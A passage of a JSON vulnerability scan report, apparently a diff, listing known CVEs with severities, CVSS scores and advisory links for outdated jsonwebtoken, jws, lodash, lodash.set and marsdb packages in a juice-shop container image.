`\u003c=8.5.1` of `jsonwebtoken` library, lack of algorithm definition in the `jwt.verify()` function can lead to signature validation bypass due to defaulting to the `none` algorithm for signature verification. Users are affected if you do not specify algorithms in the `jwt.verify()` function. This issue has been fixed, please update to version 9.0.0 which removes the default support for the none algorithm in the `jwt.verify()` method. There will be no impact, if you update to version 9.0.0 and you don’t need to allow for the `none` algorithm. If you need 'none' algorithm, you have to explicitly specify that in `jwt.verify()` options.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-287", + "CWE-347" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 3, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:L", + "V3Score": 6.4 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L", + "V3Score": 7.6 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:L", + "V3Score": 6.4 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2022-23540", + "https://github.com/auth0/node-jsonwebtoken", + "https://github.com/auth0/node-jsonwebtoken/commit/e1fa9dcc12054a8681db4e6373da1b30cf7016e3", + "https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-qwph-4952-7xr6", + "https://nvd.nist.gov/vuln/detail/CVE-2022-23540", + "https://security.netapp.com/advisory/ntap-20240621-0007", + "https://security.netapp.com/advisory/ntap-20240621-0007/", + "https://www.cve.org/CVERecord?id=CVE-2022-23540" + ], + "PublishedDate": "2022-12-22T19:15:08.967Z", + "LastModifiedDate": "2025-02-13T17:15:38.32Z" + }, + { + "VulnerabilityID": "CVE-2022-23541", + "VendorIDs": [ + "GHSA-hjrf-2m68-5959" + ], + "PkgID": "jsonwebtoken@0.4.0", + "PkgName": "jsonwebtoken", + "PkgPath": "juice-shop/node_modules/jsonwebtoken/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/jsonwebtoken@0.4.0", + "UID": "57a7893154ba8d85" + }, + "InstalledVersion": "0.4.0", + "FixedVersion": "9.0.0", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2022-23541", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:17a464e2bfcfbb5f9a8a20fb53bc5fe7994a7f3feea5381f7fe33555f89d5e38", + "Title": "jsonwebtoken: Insecure implementation of key retrieval function could lead to Forgeable Public/Private Tokens from RSA to HMAC", + "Description": "jsonwebtoken is an implementation of JSON Web Tokens. Versions `\u003c= 8.5.1` of `jsonwebtoken` library can be misconfigured so that passing a poorly implemented key retrieval function referring to the `secretOrPublicKey` argument from the readme link will result in incorrect verification of tokens. There is a possibility of using a different algorithm and key combination in verification, other than the one that was used to sign the tokens. Specifically, tokens signed with an asymmetric public key could be verified with a symmetric HS256 algorithm. This can lead to successful validation of forged tokens. If your application is supporting usage of both symmetric key and asymmetric key in jwt.verify() implementation with the same key retrieval function. This issue has been patched, please update to version 9.0.0.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-287", + "CWE-1259" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 2, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L", + "V3Score": 5 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", + "V3Score": 6.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L", + "V3Score": 5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2022-23541", + "https://github.com/auth0/node-jsonwebtoken", + "https://github.com/auth0/node-jsonwebtoken/commit/e1fa9dcc12054a8681db4e6373da1b30cf7016e3", + "https://github.com/auth0/node-jsonwebtoken/releases/tag/v9.0.0", + "https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-hjrf-2m68-5959", + "https://nvd.nist.gov/vuln/detail/CVE-2022-23541", + "https://security.netapp.com/advisory/ntap-20240621-0007", + "https://security.netapp.com/advisory/ntap-20240621-0007/", + "https://www.cve.org/CVERecord?id=CVE-2022-23541" + ], + "PublishedDate": "2022-12-22T18:15:09.39Z", + "LastModifiedDate": "2024-11-21T06:48:46.58Z" + }, + { + "VulnerabilityID": "CVE-2016-1000223", + "PkgID": "jws@0.2.6", + "PkgName": "jws", + "PkgPath": "juice-shop/node_modules/jws/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/jws@0.2.6", + "UID": "1c4fc99df2fe2c15" + }, + "InstalledVersion": "0.2.6", + "FixedVersion": "\u003e=3.0.0", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "nodejs-security-wg", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2016-1000223", + "DataSource": { + "ID": "nodejs-security-wg", + "Name": "Node.js Ecosystem Security Working Group", + "URL": "https://github.com/nodejs/security-wg" + }, + "Fingerprint": "sha256:d79e320d5cd1a2d2df2ebde3c56d1e35a6147de0dd03c0941b727b6501f26358", + "Title": "Forgeable Public/Private Tokens", + "Description": "Since \"algorithm\" isn't enforced in `jws.verify()`, a malicious user could choose what algorithm is sent to the server. If the server is expecting RSA but is sent HMAC-SHA with RSA's public key, the server will think the public key is actually an HMAC private key. This could be used to forge any data an attacker wants.\n\nIn addition, there is the `none` algorithm to be concerned about. In versions prior to 3.0.0, verification of the token could be bypassed when the `alg` field is set to `none`.\n\n*Edit ( 7/29/16 ): A previous version of this advisory incorrectly stated that the vulnerability was patched in version 2.0.0 instead of 3.0.0. The advisory has been updated to reflect this new information. Thanks to Fabien Catteau for reporting the error.*", + "Severity": "HIGH", + "VendorSeverity": { + "ghsa": 3, + "nodejs-security-wg": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N", + "V3Score": 8.7 + } + }, + "References": [ + "https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries", + "https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/", + "https://github.com/brianloveswords/node-jws", + "https://github.com/brianloveswords/node-jws/commit/585d0e1e97b6747c10cf5b7689ccc5618a89b299#diff-4ac32a78649ca5bdd8e0ba38b7006a1e", + "https://nvd.nist.gov/vuln/detail/CVE-2016-1000223", + "https://snyk.io/vuln/npm:jws:20160726", + "https://www.npmjs.com/advisories/88" + ] + }, + { + "VulnerabilityID": "CVE-2025-65945", + "VendorIDs": [ + "GHSA-869p-cjfg-cm3x" + ], + "PkgID": "jws@0.2.6", + "PkgName": "jws", + "PkgPath": "juice-shop/node_modules/jws/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/jws@0.2.6", + "UID": "1c4fc99df2fe2c15" + }, + "InstalledVersion": "0.2.6", + "FixedVersion": "3.2.3, 4.0.1", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2025-65945", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:6f77c904d26a97abe2244722d55d6bdd7a5a28b998a52a1154d79f12df13f54c", + "Title": "node-jws: auth0/node-jws: Improper signature verification in HS256 algorithm", + "Description": "auth0/node-jws is a JSON Web Signature implementation for Node.js. In versions 3.2.2 and earlier and version 4.0.0, auth0/node-jws has an improper signature verification vulnerability when using the HS256 algorithm under specific conditions. Applications are affected when they use the jws.createVerify() function for HMAC algorithms and use user-provided data from the JSON Web Signature protected header or payload in HMAC secret lookup routines, which can allow attackers to bypass signature verification. This issue has been patched in versions 3.2.3 and 4.0.1.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-347" + ], + "VendorSeverity": { + "ghsa": 3, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2025-65945", + "https://github.com/auth0/node-jws", + "https://github.com/auth0/node-jws/commit/34c45b2c04434f925b638de6a061de9339c0ea2e", + "https://github.com/auth0/node-jws/commit/4f6e73f24df42f07d632dec6431ade8eda8d11a6", + "https://github.com/auth0/node-jws/releases/tag/v3.2.3", + "https://github.com/auth0/node-jws/releases/tag/v4.0.1", + "https://github.com/auth0/node-jws/security/advisories/GHSA-869p-cjfg-cm3x", + "https://nvd.nist.gov/vuln/detail/CVE-2025-65945", + "https://www.cve.org/CVERecord?id=CVE-2025-65945" + ], + "PublishedDate": "2025-12-04T19:16:05.55Z", + "LastModifiedDate": "2026-03-09T21:19:08.997Z" + }, + { + "VulnerabilityID": "CVE-2019-10744", + "VendorIDs": [ + "GHSA-jf85-cpcp-j695" + ], + "PkgID": "lodash@2.4.2", + "PkgName": "lodash", + "PkgPath": "juice-shop/node_modules/sanitize-html/node_modules/lodash/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/lodash@2.4.2", + "UID": "ecfc229aa8403466" + }, + "InstalledVersion": "2.4.2", + "FixedVersion": "4.17.12", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2019-10744", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:b7705c3f7fd87122b5f3a7320af7e4c991c99e006851a94fc7ee21330ff72246", + "Title": "nodejs-lodash: prototype pollution in defaultsDeep function leading to modifying properties", + "Description": "Versions of lodash lower than 4.17.12 are vulnerable to Prototype Pollution. The function defaultsDeep could be tricked into adding or modifying properties of Object.prototype using a constructor payload.", + "Severity": "CRITICAL", + "CweIDs": [ + "CWE-1321" + ], + "VendorSeverity": { + "ghsa": 4, + "nvd": 4, + "redhat": 3, + "ruby-advisory-db": 4 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", + "V3Score": 9.1 + }, + "nvd": { + "V2Vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P", + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", + "V2Score": 6.4, + "V3Score": 9.1 + }, + "redhat": { + "V3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", + "V3Score": 9.1 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2019:3024", + "https://access.redhat.com/security/cve/CVE-2019-10744", + "https://github.com/advisories/GHSA-jf85-cpcp-j695", + "https://github.com/lodash/lodash/pull/4336", + "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2019-10744.yml", + "https://nvd.nist.gov/vuln/detail/CVE-2019-10744", + "https://security.netapp.com/advisory/ntap-20191004-0005", + "https://security.netapp.com/advisory/ntap-20191004-0005/", + "https://snyk.io/vuln/SNYK-JS-LODASH-450202", + "https://support.f5.com/csp/article/K47105354", + "https://support.f5.com/csp/article/K47105354?utm_source=f5support\u0026amp%3Butm_medium=RSS", + "https://support.f5.com/csp/article/K47105354?utm_source=f5support\u0026amp;utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2019-10744", + "https://www.npmjs.com/advisories/1065", + "https://www.oracle.com/security-alerts/cpujan2021.html", + "https://www.oracle.com/security-alerts/cpuoct2020.html" + ], + "PublishedDate": "2019-07-26T00:15:11.217Z", + "LastModifiedDate": "2024-11-21T04:19:50.123Z" + }, + { + "VulnerabilityID": "CVE-2018-16487", + "PkgID": "lodash@2.4.2", + "PkgName": "lodash", + "PkgPath": "juice-shop/node_modules/sanitize-html/node_modules/lodash/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/lodash@2.4.2", + "UID": "ecfc229aa8403466" + }, + "InstalledVersion": "2.4.2", + "FixedVersion": "\u003e=4.17.11", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "nodejs-security-wg", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2018-16487", + "DataSource": { + "ID": "nodejs-security-wg", + "Name": "Node.js Ecosystem Security Working Group", + "URL": "https://github.com/nodejs/security-wg" + }, + "Fingerprint": "sha256:556b2f972bea95ca60a33f6e7daa71cbeae9670f5a535420adaabe07ec347edb", + "Title": "lodash: Prototype pollution in utilities function", + "Description": "A prototype pollution vulnerability was found in lodash \u003c4.17.11 where the functions merge, mergeWith, and defaultsDeep can be tricked into adding or modifying properties of Object.prototype.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-400" + ], + "VendorSeverity": { + "ghsa": 3, + "nodejs-security-wg": 3, + "nvd": 2, + "redhat": 2, + "ruby-advisory-db": 2, + "ubuntu": 2 + }, + "CVSS": { + "nvd": { + "V2Vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P", + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "V2Score": 6.8, + "V3Score": 5.6 + }, + "redhat": { + "V3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", + "V3Score": 5.6 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2018-16487", + "https://github.com/advisories/GHSA-4xc9-xhrj-v574", + "https://github.com/lodash/lodash/commit/90e6199a161b6445b01454517b40ef65ebecd2ad", + "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2018-16487.yml", + "https://hackerone.com/reports/380873", + "https://nvd.nist.gov/vuln/detail/CVE-2018-16487", + "https://security.netapp.com/advisory/ntap-20190919-0004", + "https://security.netapp.com/advisory/ntap-20190919-0004/", + "https://www.cve.org/CVERecord?id=CVE-2018-16487", + "https://www.npmjs.com/advisories/782" + ], + "PublishedDate": "2019-02-01T18:29:00.943Z", + "LastModifiedDate": "2024-11-21T03:52:51.17Z" + }, + { + "VulnerabilityID": "CVE-2021-23337", + "VendorIDs": [ + "GHSA-35jh-r3h4-6jhm" + ], + "PkgID": "lodash@2.4.2", + "PkgName": "lodash", + "PkgPath": "juice-shop/node_modules/sanitize-html/node_modules/lodash/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/lodash@2.4.2", + "UID": "ecfc229aa8403466" + }, + "InstalledVersion": "2.4.2", + "FixedVersion": "4.17.21", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2021-23337", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:682fd66d598d7a722e9ad26e6f30cd448f660797153f1d83cbfbe1e47f68c221", + "Title": "nodejs-lodash: command injection via template", + "Description": "Lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-94" + ], + "VendorSeverity": { + "ghsa": 3, + "nvd": 3, + "redhat": 2, + "ruby-advisory-db": 3, + "ubuntu": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", + "V3Score": 7.2 + }, + "nvd": { + "V2Vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P", + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", + "V2Score": 6.5, + "V3Score": 7.2 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", + "V3Score": 7.2 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2021-23337", + "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", + "https://github.com/advisories/GHSA-35jh-r3h4-6jhm", + "https://github.com/lodash/lodash", + "https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js", + "https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js#L14851", + "https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js%23L14851", + "https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c", + "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2021-23337.yml", + "https://nvd.nist.gov/vuln/detail/CVE-2021-23337", + "https://security.netapp.com/advisory/ntap-20210312-0006", + "https://security.netapp.com/advisory/ntap-20210312-0006/", + "https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074932", + "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074930", + "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074928", + "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074931", + "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074929", + "https://snyk.io/vuln/SNYK-JS-LODASH-1040724", + "https://ubuntu.com/security/notices/USN-8411-1", + "https://www.cve.org/CVERecord?id=CVE-2021-23337", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", + "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html" + ], + "PublishedDate": "2021-02-15T13:15:12.56Z", + "LastModifiedDate": "2024-11-21T05:51:31.643Z" + }, + { + "VulnerabilityID": "CVE-2026-2950", + "VendorIDs": [ + "GHSA-f23m-r3pf-42rh" + ], + "PkgID": "lodash@2.4.2", + "PkgName": "lodash", + "PkgPath": "juice-shop/node_modules/sanitize-html/node_modules/lodash/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/lodash@2.4.2", + "UID": "ecfc229aa8403466" + }, + "InstalledVersion": "2.4.2", + "FixedVersion": "4.18.0", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-2950", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:78dcc99d6d0a95194f168e366385473a142c95e2d5464af78736dde4eee24dca", + "Title": "lodash: Lodash: Prototype pollution allows deletion of built-in prototype properties via array path bypass", + "Description": "Impact:\n\nLodash versions 4.17.23 and earlier are vulnerable to prototype pollution in the _.unset and _.omit functions. The fix for (CVE-2025-13465: https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg) only guards against string key members, so an attacker can bypass the check by passing array-wrapped path segments. This allows deletion of properties from built-in prototypes such as Object.prototype, Number.prototype, and String.prototype.\n\nThe issue permits deletion of prototype properties but does not allow overwriting their original behavior.\n\nPatches:\n\nThis issue is patched in 4.18.0.\n\nWorkarounds:\n\nNone. Upgrade to the patched version.", + "Severity": "MEDIUM", + "CweIDs": [ + "CWE-1321" + ], + "VendorSeverity": { + "ghsa": 2, + "nvd": 2, + "redhat": 2, + "ubuntu": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", + "V3Score": 6.5 + }, + "nvd": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "V3Score": 5.3 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-2950", + "https://github.com/lodash/lodash", + "https://github.com/lodash/lodash/security/advisories/GHSA-f23m-r3pf-42rh", + "https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg", + "https://nvd.nist.gov/vuln/detail/CVE-2026-2950", + "https://ubuntu.com/security/notices/USN-8411-1", + "https://www.cve.org/CVERecord?id=CVE-2026-2950" + ], + "PublishedDate": "2026-03-31T20:16:26.207Z", + "LastModifiedDate": "2026-04-07T16:12:25.97Z" + }, + { + "VulnerabilityID": "CVE-2018-3721", + "PkgID": "lodash@2.4.2", + "PkgName": "lodash", + "PkgPath": "juice-shop/node_modules/sanitize-html/node_modules/lodash/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/lodash@2.4.2", + "UID": "ecfc229aa8403466" + }, + "InstalledVersion": "2.4.2", + "FixedVersion": "\u003e=4.17.5", + "Status": "fixed", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "nodejs-security-wg", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2018-3721", + "DataSource": { + "ID": "nodejs-security-wg", + "Name": "Node.js Ecosystem Security Working Group", + "URL": "https://github.com/nodejs/security-wg" + }, + "Fingerprint": "sha256:d56ed0b7067d37d1d944c0f29c603e37e9a24ff8b6dda4c431edfd59946e8ce6", + "Title": "lodash: Prototype pollution in utilities function", + "Description": "lodash node module before 4.17.5 suffers from a Modification of Assumed-Immutable Data (MAID) vulnerability via defaultsDeep, merge, and mergeWith functions, which allows a malicious user to modify the prototype of \"Object\" via __proto__, causing the addition or modification of an existing property that will exist on all objects.", + "Severity": "LOW", + "CweIDs": [ + "CWE-471", + "CWE-1321" + ], + "VendorSeverity": { + "ghsa": 2, + "nodejs-security-wg": 1, + "nvd": 2, + "redhat": 1, + "ruby-advisory-db": 2, + "ubuntu": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", + "V3Score": 6.5 + }, + "nvd": { + "V2Vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N", + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", + "V2Score": 4, + "V3Score": 6.5 + }, + "redhat": { + "V3Vector": "CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 2.9 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2018-3721", + "https://github.com/advisories/GHSA-fvqr-27wr-82fm", + "https://github.com/lodash/lodash/commit/d8e069cc3410082e44eb18fcf8e7f3d08ebe1d4a", + "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2018-3721.yml", + "https://hackerone.com/reports/310443", + "https://nvd.nist.gov/vuln/detail/CVE-2018-3721", + "https://security.netapp.com/advisory/ntap-20190919-0004", + "https://security.netapp.com/advisory/ntap-20190919-0004/", + "https://snyk.io/vuln/npm:lodash:20180130", + "https://www.cve.org/CVERecord?id=CVE-2018-3721", + "https://www.npmjs.com/advisories/577" + ], + "PublishedDate": "2018-06-07T02:29:08.317Z", + "LastModifiedDate": "2024-11-21T04:05:56.943Z" + }, + { + "VulnerabilityID": "CVE-2020-8203", + "VendorIDs": [ + "GHSA-p6mc-m468-83gw" + ], + "PkgID": "lodash.set@4.3.2", + "PkgName": "lodash.set", + "PkgPath": "juice-shop/node_modules/lodash.set/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/lodash.set@4.3.2", + "UID": "e42be95e03ab854d" + }, + "InstalledVersion": "4.3.2", + "Status": "affected", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2020-8203", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:a4b752cfd9b521cd7dfd24ab53777d9d5ffb7ee854b14cc537cd41cbe06522e9", + "Title": "nodejs-lodash: prototype pollution in zipObjectDeep function", + "Description": "Prototype pollution attack when using _.zipObjectDeep in lodash before 4.17.20.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-770", + "CWE-1321" + ], + "VendorSeverity": { + "ghsa": 3, + "nvd": 3, + "redhat": 2, + "ruby-advisory-db": 3, + "ubuntu": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H", + "V3Score": 7.4 + }, + "nvd": { + "V2Vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P", + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H", + "V2Score": 5.8, + "V3Score": 7.4 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H", + "V3Score": 7.4 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2020-8203", + "https://github.com/advisories/GHSA-p6mc-m468-83gw", + "https://github.com/github/advisory-database/pull/2884", + "https://github.com/lodash/lodash", + "https://github.com/lodash/lodash/commit/c84fe82760fb2d3e03a63379b297a1cc1a2fce12", + "https://github.com/lodash/lodash/issues/4744", + "https://github.com/lodash/lodash/issues/4874", + "https://github.com/lodash/lodash/wiki/Changelog#v41719", + "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2020-8203.yml", + "https://hackerone.com/reports/712065", + "https://hackerone.com/reports/864701", + "https://nvd.nist.gov/vuln/detail/CVE-2020-8203", + "https://security.netapp.com/advisory/ntap-20200724-0006", + "https://security.netapp.com/advisory/ntap-20200724-0006/", + "https://ubuntu.com/security/notices/USN-8411-1", + "https://web.archive.org/web/20210914001339/https://github.com/lodash/lodash/issues/4744", + "https://www.cve.org/CVERecord?id=CVE-2020-8203", + "https://www.npmjs.com/advisories/1523", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuApr2021.html", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html" + ], + "PublishedDate": "2020-07-15T17:15:11.797Z", + "LastModifiedDate": "2024-11-21T05:38:29.79Z" + }, + { + "VulnerabilityID": "GHSA-5mrr-rgp6-x4gr", + "PkgID": "marsdb@0.6.11", + "PkgName": "marsdb", + "PkgPath": "juice-shop/node_modules/marsdb/package.json", + "PkgIdentifier": { + "PURL": "pkg:npm/marsdb@0.6.11", + "UID": "fa292712ddb319ba" + }, + "InstalledVersion": "0.6.11", + "Status": "affected", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "SeveritySource": "ghsa", + "PrimaryURL": "https://github.com/advisories/GHSA-5mrr-rgp6-x4gr", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": 